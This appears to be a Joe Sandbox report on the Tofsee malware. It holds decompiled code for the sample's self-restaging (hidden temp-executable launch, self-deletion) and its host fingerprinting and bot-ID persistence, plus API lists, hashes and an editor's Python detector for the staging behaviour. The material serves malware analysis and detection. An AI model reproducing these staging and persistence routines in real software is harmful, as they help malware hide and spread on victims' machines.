                                                                                                                                  									_t149 = RegQueryValueExA(_v12,  *0x2522c38, 0,  &_v28, _t147,  &_v16);
                                                                                                                                  									__eflags = _t149;
                                                                                                                                  									if(_t149 != 0) {
                                                                                                                                  										E0251EC2E(_v8);
                                                                                                                                  										_pop(_t173);
                                                                                                                                  										_v8 = 0;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					RegCloseKey(_v12);
                                                                                                                                  					__eflags = _v8;
                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                  						_t146 = E0251EED1(_v8,  *0x2522c3c);
                                                                                                                                  						_pop(_t173);
                                                                                                                                  						__eflags = _t146;
                                                                                                                                  						if(_t146 == 0) {
                                                                                                                                  							goto L35;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L31;
                                                                                                                                  				} else {
                                                                                                                                  					_t153 = E025173FF(_t173, 0x2520264, 0, 0,  &_v388,  &_v60); // executed
                                                                                                                                  					_t199 = _t196 + 0x14;
                                                                                                                                  					__eflags = _t153;
                                                                                                                                  					if(_t153 <= 0) {
                                                                                                                                  						L19:
                                                                                                                                  						_t91 = 0;
                                                                                                                                  						L56:
                                                                                                                                  						return _t91;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _v388;
                                                                                                                                  					if(_v388 == 0) {
                                                                                                                                  						goto L19;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _v60;
                                                                                                                                  					if(_v60 == 0) {
                                                                                                                                  						goto L19;
                                                                                                                                  					} else {
                                                                                                                                  						_t154 =  &_v388;
                                                                                                                                  						_t181 = _t154 + 1;
                                                                                                                                  						do {
                                                                                                                                  							_t180 =  *_t154;
                                                                                                                                  							_t154 = _t154 + 1;
                                                                                                                                  							__eflags = _t180;
                                                                                                                                  						} while (_t180 != 0);
                                                                                                                                  						_t156 = _t195 + _t154 - _t181 - 0x181;
                                                                                                                                  						__eflags =  *_t156 - 0x5c;
                                                                                                                                  						if( *_t156 == 0x5c) {
                                                                                                                                  							 *_t156 = 0;
                                                                                                                                  						}
                                                                                                                                  						__eflags =  *0x2522159 - 0x60;
                                                                                                                                  						if( *0x2522159 < 0x60) {
                                                                                                                                  							L18:
                                                                                                                                  							E0251EE2A(_t180, 0x25222f8, 0, 0x100);
                                                                                                                                  							_t196 = _t199 + 0xc;
                                                                                                                                  							L37:
                                                                                                                                  							_v20 = 0;
                                                                                                                                  							_v8 = 0;
                                                                                                                                  							__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								L42:
                                                                                                                                  								__eflags =  *0x2522cd8; // 0x0
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									L46:
                                                                                                                                  									_t89 = E02516BA7(0x2522cd8);
                                                                                                                                  									_pop(_t174);
                                                                                                                                  									__eflags = _t89;
                                                                                                                                  									if(_t89 == 0) {
                                                                                                                                  										L52:
                                                                                                                                  										 *0x2522cd8 = 0;
                                                                                                                                  										L53:
                                                                                                                                  										__eflags = _v8;
                                                                                                                                  										if(_v8 != 0) {
                                                                                                                                  											E0251EC2E(_v8);
                                                                                                                                  										}
                                                                                                                                  										_t91 = 1;
                                                                                                                                  										__eflags = 1;
                                                                                                                                  										goto L56;
                                                                                                                                  									}
                                                                                                                                  									_t93 = E02517E2F(_t181);
                                                                                                                                  									__eflags = _t93;
                                                                                                                                  									if(_t93 != 0) {
                                                                                                                                  										L51:
                                                                                                                                  										DeleteFileA(0x2522cd8);
                                                                                                                                  										goto L52;
                                                                                                                                  									}
                                                                                                                                  									_t193 = 0x44;
                                                                                                                                  									E0251EE2A(_t174,  &_v128, 0, _t193);
                                                                                                                                  									_v128.cb = _t193;
                                                                                                                                  									E0251EE2A(_t174,  &_v44, 0, 0x10);
                                                                                                                                  									_v428 = 0x22;
                                                                                                                                  									lstrcpyA( &_v427, 0x2522cd8);
                                                                                                                                  									_t102 = lstrlenA( &_v428);
                                                                                                                                  									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
                                                                                                                                  									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
                                                                                                                                  									E02517FCF(_t174);
                                                                                                                                  									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
                                                                                                                                  									__eflags = _t107;
                                                                                                                                  									if(_t107 == 0) {
                                                                                                                                  										E02517EE6(_t174);
                                                                                                                                  										E02517EAD(_t181, __eflags, 0);
                                                                                                                                  										goto L51;
                                                                                                                                  									}
                                                                                                                                  									CloseHandle(_v44.hThread);
                                                                                                                                  									CloseHandle(_v44);
                                                                                                                                  									goto L53;
                                                                                                                                  								}
                                                                                                                                  								GetTempPathA(0x12c, 0x2522cd8);
                                                                                                                                  								_t113 = E02518274(0x2522cd8);
                                                                                                                                  								_pop(_t177);
                                                                                                                                  								_v24 = _t113;
                                                                                                                                  								_t116 = (E0251ECA5() & 0x00000003) + 5;
                                                                                                                                  								_v20 = _t116;
                                                                                                                                  								__eflags = _t116;
                                                                                                                                  								if(_t116 <= 0) {
                                                                                                                                  									L45:
                                                                                                                                  									_t117 = E02512544(0x25222f8, 0x2520694, 5, 0xe4, 0xc8);
                                                                                                                                  									_t69 = _v24 + 0x2522cd8; // 0x0
                                                                                                                                  									E0251EF00(_t69, _t117);
                                                                                                                                  									E0251EE2A(_t177, 0x25222f8, 0, 0x100);
                                                                                                                                  									_t196 = _t196 + 0x28;
                                                                                                                                  									goto L46;
                                                                                                                                  								} else {
                                                                                                                                  									goto L44;
                                                                                                                                  								}
                                                                                                                                  								do {
                                                                                                                                  									L44:
                                                                                                                                  									_t122 = E0251ECA5();
                                                                                                                                  									_t177 = 0x1a;
                                                                                                                                  									_t181 = _t122 % _t177 + 0x61;
                                                                                                                                  									_v24 = _v24 + 1;
                                                                                                                                  									_v20 = _v20 - 1;
                                                                                                                                  									 *((char*)(_v24 + 0x2522cd8)) = _t122 % _t177 + 0x61;
                                                                                                                                  									__eflags = _v20;
                                                                                                                                  								} while (_v20 > 0);
                                                                                                                                  								goto L45;
                                                                                                                                  							}
                                                                                                                                  							_t126 = E0251675C("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v20, 0); // executed
                                                                                                                                  							_t196 = _t196 + 0xc;
                                                                                                                                  							_v8 = _t126;
                                                                                                                                  							__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								goto L42;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t126;
                                                                                                                                  							if(_t126 == 0) {
                                                                                                                                  								goto L42;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _v20 -  *0x25221a4; // 0x47a00
                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                  								goto L42;
                                                                                                                                  							}
                                                                                                                                  							_t128 = E025124C2(_v8, _t127, 0);
                                                                                                                                  							_t196 = _t196 + 0xc;
                                                                                                                                  							__eflags =  *0x25222d4 - _t128; // 0x92c105df
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								goto L53;
                                                                                                                                  							}
                                                                                                                                  							goto L42;
                                                                                                                                  						}
                                                                                                                                  						_t189 = 4;
                                                                                                                                  						_v8 = 0;
                                                                                                                                  						_v16 = _t189;
                                                                                                                                  						_t159 = E02512544(0x25222f8,  &E02520710, 0x35, 0xe4, 0xc8);
                                                                                                                                  						_t199 = _t199 + 0x14;
                                                                                                                                  						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12); // executed
                                                                                                                                  						__eflags = _t160;
                                                                                                                                  						if(_t160 != 0) {
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16); // executed
                                                                                                                                  						__eflags = _t165;
                                                                                                                                  						if(_t165 != 0) {
                                                                                                                                  							L16:
                                                                                                                                  							_v8 = 0;
                                                                                                                                  							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189); // executed
                                                                                                                                  							L17:
                                                                                                                                  							RegCloseKey(_v12);
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v28 - _t189;
                                                                                                                                  						if(_v28 != _t189) {
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v16 - _t189;
                                                                                                                                  						if(_v16 != _t189) {
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v8;
                                                                                                                                  						if(_v8 == 0) {
                                                                                                                                  							goto L17;
                                                                                                                                  						}
                                                                                                                                  						goto L16;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}
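The function above contains the installation/re-staging logic that the "Deletes itself after installation" and "Drops executables to the windows directory" signatures refer to: it reads back the implanted copy at C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe, compares its size against *0x25221a4 (0x47a00) and a checksum against *0x25222d4 (0x92c105df), and if either check fails builds a fresh name from GetTempPathA() plus (rand() & 3) + 5 = 5..8 letters in 'a'..'z', wraps it in double quotes (0x22), launches it with CreateProcessA and dwCreationFlags 0x8000000 (CREATE_NO_WINDOW), and deletes the temp file if the launch fails. The following detection helper is an added example written by the editor; it is not part of the Joe Sandbox report and not Tofsee's code. It re-implements the name generator with a caller-supplied RNG and runs a classifier over constructed Sysmon-style process-creation lines. The '.exe' suffix on the temp name is inferred from the 5-byte string appended at L45 and the 'Image=...|CommandLine=...' log format is constructed for the example; neither is confirmed by the page.

```python
"""Added example (editor's own code; not from the Joe Sandbox report and not
Tofsee's code): detection logic for the staging behaviour visible in the
decompiled function above, run over constructed Sysmon-style lines.

Taken from the decompilation:
  * the implanted copy is C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe;
  * on a failed size/checksum check the sample takes GetTempPathA() and
    appends (rand() & 3) + 5 = 5..8 characters, each rand() % 26 + 0x61
    ('a'..'z'), quotes the path (0x22) and calls CreateProcessA with
    dwCreationFlags 0x8000000 (CREATE_NO_WINDOW), deleting the file if the
    launch fails.

Assumptions (not confirmed by the page): the ".exe" suffix on the temp name
is inferred from the 5-byte string appended at L45; the log line format
'Image=...|CommandLine=...' is constructed for this example.
"""
import re

IMPLANT_PATH = r"C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe"

# Quoted command line whose image sits directly in a Temp directory and whose
# base name is 5..8 lowercase letters, optionally followed by .exe (assumed).
TEMP_STAGING_RE = re.compile(
    r'^"(?P<path>[A-Za-z]:\\(?:[^"\\]+\\)*?(?:Temp|TEMP|tmp)\\(?P<name>[a-z]{5,8})(?:\.exe)?)"\s*$'
)


def random_name(rand):
    """Re-implementation of the name generator (L44/L45 in the listing).

    `rand` is a caller-supplied zero-argument function standing in for the
    sample's own RNG (E0251ECA5), so results are reproducible in a test.
    """
    length = (rand() & 3) + 5  # 5..8 characters
    return "".join(chr(rand() % 26 + 0x61) for _ in range(length))


def classify_event(image, command_line):
    """Return an indicator name for one process-creation event, or None."""
    if image.lower() == IMPLANT_PATH.lower():
        return "implant_path"
    if TEMP_STAGING_RE.match(command_line.strip()):
        return "temp_staging"
    return None


def scan(log_lines):
    """Run classify_event over 'key=value|key=value' lines; return hits."""
    hits = []
    for line in log_lines:
        fields = dict(part.split("=", 1) for part in line.split("|") if "=" in part)
        image = fields.get("Image", "")
        verdict = classify_event(image, fields.get("CommandLine", ""))
        if verdict is not None:
            hits.append((verdict, image))
    return hits


# Constructed sample log: two events matching the behaviour, two benign ones.
SAMPLE_LOG = [
    r"Image=C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe|CommandLine=C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe",
    r'Image=C:\Users\user\AppData\Local\Temp\kqzpvw.exe|CommandLine="C:\Users\user\AppData\Local\Temp\kqzpvw.exe"',
    r'Image=C:\Users\user\AppData\Local\Temp\setup_installer.exe|CommandLine="C:\Users\user\AppData\Local\Temp\setup_installer.exe" /S',
    r"Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe",
]

if __name__ == "__main__":
    for verdict, image in scan(SAMPLE_LOG):
        print(f"{verdict}: {image}")
```

The implant-path check is deliberately exact, since this report only shows the one path; the temp-staging rule keys on the name shape the generator produces (all lowercase, no digits, 5 to 8 characters) rather than on any fixed name, which is what survives across runs of the sample.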

Instruction addresses listed against the decompiled lines above, in order: 0x02518328, 0x02518328, 0x02518334, 0x0251833e, 0x00000000, 0x02518342, 0x0251834a, 0x02518354, 0x02518356, 0x0251846b, 0x0251846e, 0x02518474, 0x00000000, 0x00000000, 0x0251847a, 0x02518480, 0x00000000, 0x00000000, 0x025184a2, 0x025184ad, 0x025184b6, 0x025184b8, 0x025184ba, 0x02518543, 0x0251855f, 0x02518564, 0x0251856d, 0x0251856f, 0x02518571, 0x025185a5, 0x025185ac, 0x025185b1, 0x025185b4, 0x025185b7, 0x025185bc, 0x025185c1, 0x00000000, 0x025185b7, 0x02518573, 0x02518579, 0x0251857b, 0x0251857b, 0x0251857e, 0x0251857e, 0x02518580, 0x02518581, 0x02518581, 0x02518587, 0x02518587, 0x02518596, 0x0251859f, 0x00000000, 0x0251859f
                                                                                                                                  0x025184d3
                                                                                                                                  0x025184d9
                                                                                                                                  0x025184db
                                                                                                                                  0x025184dd
                                                                                                                                  0x025184e1
                                                                                                                                  0x025184e3
                                                                                                                                  0x025184e6
                                                                                                                                  0x025184eb
                                                                                                                                  0x025184f0
                                                                                                                                  0x025184f1
                                                                                                                                  0x025184f4
                                                                                                                                  0x025184f6
                                                                                                                                  0x025184f8
                                                                                                                                  0x0251850b
                                                                                                                                  0x02518511
                                                                                                                                  0x02518513
                                                                                                                                  0x02518518
                                                                                                                                  0x0251851d
                                                                                                                                  0x0251851e
                                                                                                                                  0x0251851e
                                                                                                                                  0x02518513
                                                                                                                                  0x025184f6
                                                                                                                                  0x025184e6
                                                                                                                                  0x025184e1
                                                                                                                                  0x02518524
                                                                                                                                  0x0251852a
                                                                                                                                  0x0251852d
                                                                                                                                  0x02518538
                                                                                                                                  0x0251853e
                                                                                                                                  0x0251853f
                                                                                                                                  0x02518541
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518541
                                                                                                                                  0x00000000
                                                                                                                                  0x0251835c
                                                                                                                                  0x0251836e
                                                                                                                                  0x02518373
                                                                                                                                  0x02518376
                                                                                                                                  0x02518378
                                                                                                                                  0x02518464
                                                                                                                                  0x02518464
                                                                                                                                  0x02518779
                                                                                                                                  0x00000000
                                                                                                                                  0x0251877a
                                                                                                                                  0x0251837e
                                                                                                                                  0x02518384
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251838a
                                                                                                                                  0x0251838d
                                                                                                                                  0x00000000
                                                                                                                                  0x02518393
                                                                                                                                  0x02518393
                                                                                                                                  0x02518399
                                                                                                                                  0x0251839c
                                                                                                                                  0x0251839c
                                                                                                                                  0x0251839e
                                                                                                                                  0x0251839f
                                                                                                                                  0x0251839f
                                                                                                                                  0x025183a5
                                                                                                                                  0x025183ac
                                                                                                                                  0x025183af
                                                                                                                                  0x025183b1
                                                                                                                                  0x025183b1
                                                                                                                                  0x025183b3
                                                                                                                                  0x025183ba
                                                                                                                                  0x02518450
                                                                                                                                  0x02518457
                                                                                                                                  0x0251845c
                                                                                                                                  0x025185c2
                                                                                                                                  0x025185c2
                                                                                                                                  0x025185c5
                                                                                                                                  0x025185c8
                                                                                                                                  0x025185ce
                                                                                                                                  0x02518615
                                                                                                                                  0x0251861a
                                                                                                                                  0x02518620
                                                                                                                                  0x025186a7
                                                                                                                                  0x025186a8
                                                                                                                                  0x025186ad
                                                                                                                                  0x025186ae
                                                                                                                                  0x025186b0
                                                                                                                                  0x02518762
                                                                                                                                  0x02518762
                                                                                                                                  0x02518768
                                                                                                                                  0x02518768
                                                                                                                                  0x0251876b
                                                                                                                                  0x02518770
                                                                                                                                  0x02518775
                                                                                                                                  0x02518778
                                                                                                                                  0x02518778
                                                                                                                                  0x00000000
                                                                                                                                  0x02518778
                                                                                                                                  0x025186b6
                                                                                                                                  0x025186bb
                                                                                                                                  0x025186bd
                                                                                                                                  0x0251875b
                                                                                                                                  0x0251875c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251875c
                                                                                                                                  0x025186c5
                                                                                                                                  0x025186cc
                                                                                                                                  0x025186d8
                                                                                                                                  0x025186db
                                                                                                                                  0x025186eb
                                                                                                                                  0x025186f2
                                                                                                                                  0x025186ff
                                                                                                                                  0x02518705
                                                                                                                                  0x0251870d
                                                                                                                                  0x02518714
                                                                                                                                  0x02518733
                                                                                                                                  0x02518739
                                                                                                                                  0x0251873b
                                                                                                                                  0x0251874f
                                                                                                                                  0x02518755
                                                                                                                                  0x00000000
                                                                                                                                  0x0251875a
                                                                                                                                  0x02518746
                                                                                                                                  0x0251874b
                                                                                                                                  0x00000000
                                                                                                                                  0x0251874b
                                                                                                                                  0x0251862c
                                                                                                                                  0x02518633
                                                                                                                                  0x02518638
                                                                                                                                  0x02518639
                                                                                                                                  0x02518644
                                                                                                                                  0x02518647
                                                                                                                                  0x0251864a
                                                                                                                                  0x0251864c
                                                                                                                                  0x02518671
                                                                                                                                  0x02518683
                                                                                                                                  0x0251868c
                                                                                                                                  0x02518693
                                                                                                                                  0x0251869f
                                                                                                                                  0x025186a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251864e
                                                                                                                                  0x0251864e
                                                                                                                                  0x0251864e
                                                                                                                                  0x02518657
                                                                                                                                  0x0251865d
                                                                                                                                  0x02518660
                                                                                                                                  0x02518663
                                                                                                                                  0x02518666
                                                                                                                                  0x0251866c
                                                                                                                                  0x0251866c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251864e
                                                                                                                                  0x025185da
                                                                                                                                  0x025185df
                                                                                                                                  0x025185e2
                                                                                                                                  0x025185e5
                                                                                                                                  0x025185eb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025185ed
                                                                                                                                  0x025185ef
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025185f4
                                                                                                                                  0x025185fa
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518601
                                                                                                                                  0x02518606
                                                                                                                                  0x02518609
                                                                                                                                  0x0251860f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251860f
                                                                                                                                  0x025183c2
                                                                                                                                  0x025183df
                                                                                                                                  0x025183e2
                                                                                                                                  0x025183e5
                                                                                                                                  0x025183ea
                                                                                                                                  0x025183f3
                                                                                                                                  0x025183f9
                                                                                                                                  0x025183fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518414
                                                                                                                                  0x0251841a
                                                                                                                                  0x0251841c
                                                                                                                                  0x0251842d
                                                                                                                                  0x0251843e
                                                                                                                                  0x02518441
                                                                                                                                  0x02518447
                                                                                                                                  0x0251844a
                                                                                                                                  0x00000000
                                                                                                                                  0x0251844a
                                                                                                                                  0x0251841e
                                                                                                                                  0x02518421
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518423
                                                                                                                                  0x02518426
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518428
                                                                                                                                  0x0251842b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251842b
                                                                                                                                  0x0251838d

APIs
• RegOpenKeyExA.KERNEL32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 025183F3
• RegQueryValueExA.KERNEL32(02520750,?,00000000,?,02518893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 02518414
• RegSetValueExA.KERNEL32(02520750,?,00000000,00000004,02518893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 02518441
• RegCloseKey.ADVAPI32(02520750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0251844A
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: Value$CloseOpenQuery
• String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$localcfg
• API String ID: 237177642-493989863
• Opcode ID: dfde7cea5dc4fb10f494acd6f07448a72d9c162f5ab5def14efead2c1cd88c01
• Instruction ID: 495b15f63faf11b5693b718e0ff541e23172d4261278b8bc5f4629bc73e8309c
• Opcode Fuzzy Hash: dfde7cea5dc4fb10f494acd6f07448a72d9c162f5ab5def14efead2c1cd88c01
• Instruction Fuzzy Hash: 24C190B1D41109BEFB21AFA4DC89EEE7BBEFB45304F150465E905A2080EB705A589F28
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 95%
E02511D96(void* __ecx, intOrPtr* _a4) {
	struct _OSVERSIONINFOA _v156;
	struct _SYSTEM_INFO _v192;
	char _v196;
	intOrPtr _v200;
	intOrPtr _t59;
	signed int _t61;
	signed int _t63;
	void* _t64;
	void* _t65;
	intOrPtr _t66;
	intOrPtr _t67;
	intOrPtr _t69;
	signed int _t71;
	intOrPtr _t74;
	intOrPtr _t77;
	char* _t92;   /* declaration added: used below but missing from the decompiler output */
	intOrPtr _t93;
	char* _t94;   /* declaration added */
	char* _t95;   /* declaration added */
	intOrPtr _t96;
	intOrPtr _t97;
	intOrPtr _t102;
	intOrPtr* _t103;
	char* _t104;  /* declaration added */
	intOrPtr* _t105;
	void* _t109;
	void* _t110;
	void* _t111;
	void* _t112;
	void* _t113;
	void* _t114;

	/* _a4 points at a 0x64-byte host-info structure that this routine fills in.
	   Helper names (E0251EE2A, E0251E819, E0251EA84, ...) are decompiler-generated;
	   their roles below are inferred from the arguments and the API list above. */
	_t105 = _a4;
	_t102 = 0x64;
	E0251EE2A(__ecx, _t105, 0, _t102); /* presumably zero-fills the structure */
	_t109 =  &_v200 + 0xc;
	 *_t105 = _t102; /* structure size at offset 0 */
	/* OS version, packed as (major << 4) + minor into the byte at offset 0x41 */
	_v156.dwOSVersionInfoSize = 0x9c;
	if(GetVersionExA( &_v156) == 0) {
		 *((char*)(_t105 + 0x41)) = 0;
	} else {
		 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
	}
	GetSystemInfo( &_v192); // executed
	 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
	/* IsWow64Process is resolved dynamically so the sample still loads on systems without it;
	   the result sets bit 0x200 of the flags word at offset 0x18 further down. */
	_v196 = 0;
	_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
	if(_t103 != 0) {
		 *_t103(GetCurrentProcess(),  &_v196);
	}
	/* E0251E819(1, "localcfg", name, default) reads and E0251EA84(1, "localcfg", name, value)
	   writes a named value of the "localcfg" configuration store (see the
	   RegQueryValueExA/RegSetValueExA references above); inferred, not confirmed by the report. */
	_t104 = "localcfg";
	 *((char*)(_t105 + 0x40)) = 2;
	_t59 = E0251E819(1, "localcfg", "lid_file_upd", 0);
	_t92 = "flags_upd";
	 *((intOrPtr*)(_t105 + 0x24)) = _t59;
	 *(_t105 + 4) =  *(_t105 + 4) | E0251E819(1, "localcfg", "flags_upd", 0);
	_t61 =  *(_t105 + 4);
	_t110 = _t109 + 0x20;
	/* flag bit 0x8 is a one-shot: it is cleared and the "work_srv"/"start_srv" entries are processed */
	if((_t61 & 0x00000008) != 0) {
		 *(_t105 + 4) = _t61 & 0xfffffff7;
		E0251DF70(1, "work_srv");
		E0251DF70(1, "start_srv");
		_t110 = _t110 + 0x10;
	}
	E0251EA84(1, _t104, _t92, 0); // executed
	_t93 = 0;
	/* network type: bit 0x10 or 0x20 is set depending on the result of E0251199C */
	_t63 = E0251E819(1, _t104, "net_type", 0);
	_t111 = _t110 + 0x20;
	 *(_t105 + 0x14) = _t63;
	_t64 = E0251199C(_t63); // executed
	if(_t64 == 0) {
		 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
	} else {
		 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
	}
	/* "born_date" is created on first run and persisted; later runs reuse the stored value */
	_t65 = E0251E819(1, _t104, "born_date", _t93);
	_t112 = _t111 + 0x10;
	 *((intOrPtr*)(_t105 + 0x30)) = _t93;
	if(_t65 == _t93) {
		_t97 = E0251F04E(_t93);
		E0251EA84(1, _t104, "born_date", _t97);
		_t112 = _t112 + 0x14;
		 *((intOrPtr*)(_t105 + 0x30)) = _t97;
		_t93 = 0;
	}
	/* "id" and "hi_id" are likewise generated once (E02511B71 / E02511BDF) and persisted */
	_t94 = "id";
	_t66 = E0251E819(1, _t104, "id", _t93);
	_t113 = _t112 + 0x10;
	 *((intOrPtr*)(_t105 + 0xc)) = _t66;
	if(_t66 == 0) {
		_t77 = E02511B71(); // executed
		_v200 = _t77;
		E0251EA84(1, _t104, _t94, _t77);
		_t113 = _t113 + 0x10;
		 *((intOrPtr*)(_t105 + 0xc)) = _v200;
	}
	_t95 = "hi_id";
	_t67 = E0251E819(1, _t104, "hi_id", 0);
	_t114 = _t113 + 0x10;
	 *((intOrPtr*)(_t105 + 0x10)) = _t67;
	if(_t67 == 0) {
		_t74 = E02511BDF(); // executed
		_v200 = _t74;
		E0251EA84(1, _t104, _t95, _t74);
		_t114 = _t114 + 0x10;
		 *((intOrPtr*)(_t105 + 0x10)) = _v200;
	}
	 *((intOrPtr*)(_t105 + 8)) = 0x5e; /* constant at offset 8 */
	/* "loader_id" defaults to 0xd if not yet stored */
	_t96 = E0251E819(1, _t104, "loader_id", 0);
	if(_t96 == 0) {
		_t96 = 0xd;
		E0251EA84(1, _t104, "loader_id", _t96);
	}
	 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
	_t69 = E025130B5(); // executed
	 *((intOrPtr*)(_t105 + 0x34)) = _t69;
	/* flags word at offset 0x18, chosen from two global byte flags and E02516EC3 */
	if( *0x252201d == 0) {
		if( *0x252201f == 0) {
			 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
		} else {
			if(E02516EC3() != 0) {
				 *(_t105 + 0x18) = 2;
			} else {
				 *(_t105 + 0x18) = 0x10;
			}
		}
	} else {
		 *(_t105 + 0x18) = 1;
	}
	if(_v196 != 0) {
		 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200; /* running under WOW64 */
	}
	/* uptime in seconds, kept both in a global and at offset 0x28 */
	_t71 = GetTickCount() / 0x3e8;
	 *0x2522110 = _t71;
	 *(_t105 + 0x28) = _t71;
	return _t71;
}
                                                                                                                                  0x02511f16
                                                                                                                                  0x02511f1e
                                                                                                                                  0x02511f23
                                                                                                                                  0x02511f26
                                                                                                                                  0x02511f2b
                                                                                                                                  0x02511f2d
                                                                                                                                  0x02511f36
                                                                                                                                  0x02511f3a
                                                                                                                                  0x02511f43
                                                                                                                                  0x02511f46
                                                                                                                                  0x02511f46
                                                                                                                                  0x02511f52
                                                                                                                                  0x02511f5e
                                                                                                                                  0x02511f65
                                                                                                                                  0x02511f69
                                                                                                                                  0x02511f72
                                                                                                                                  0x02511f77
                                                                                                                                  0x02511f7a
                                                                                                                                  0x02511f7d
                                                                                                                                  0x02511f82
                                                                                                                                  0x02511f8c
                                                                                                                                  0x02511f9a
                                                                                                                                  0x02511fb7
                                                                                                                                  0x02511f9c
                                                                                                                                  0x02511fa3
                                                                                                                                  0x02511fae
                                                                                                                                  0x02511fa5
                                                                                                                                  0x02511fa5
                                                                                                                                  0x02511fa5
                                                                                                                                  0x02511fa3
                                                                                                                                  0x02511f8e
                                                                                                                                  0x02511f8e
                                                                                                                                  0x02511f8e
                                                                                                                                  0x02511fc0
                                                                                                                                  0x02511fc2
                                                                                                                                  0x02511fc2
                                                                                                                                  0x02511fd6
                                                                                                                                  0x02511fd9
                                                                                                                                  0x02511fde
                                                                                                                                  0x02511fea

APIs
• GetVersionExA.KERNEL32 ref: 02511DC6
• GetSystemInfo.KERNEL32(?), ref: 02511DE8
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 02511E03
• GetProcAddress.KERNEL32(00000000), ref: 02511E0A
• GetCurrentProcess.KERNEL32(?), ref: 02511E1B
• GetTickCount.KERNEL32 ref: 02511FC9
  • Part of subcall function 02511BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 02511C15
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
• String ID: 0 v$IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
• API String ID: 4207808166-1853734742
• Opcode ID: cb283fdf6d1a12678ddd208a51bda4aa710e08512e9b37845043da4566e6c605
• Instruction ID: 82dd8c323ff4a729c40c6d4aa550310b19583d82717afe8859bebc8ecd1930f3
• Opcode Fuzzy Hash: cb283fdf6d1a12678ddd208a51bda4aa710e08512e9b37845043da4566e6c605
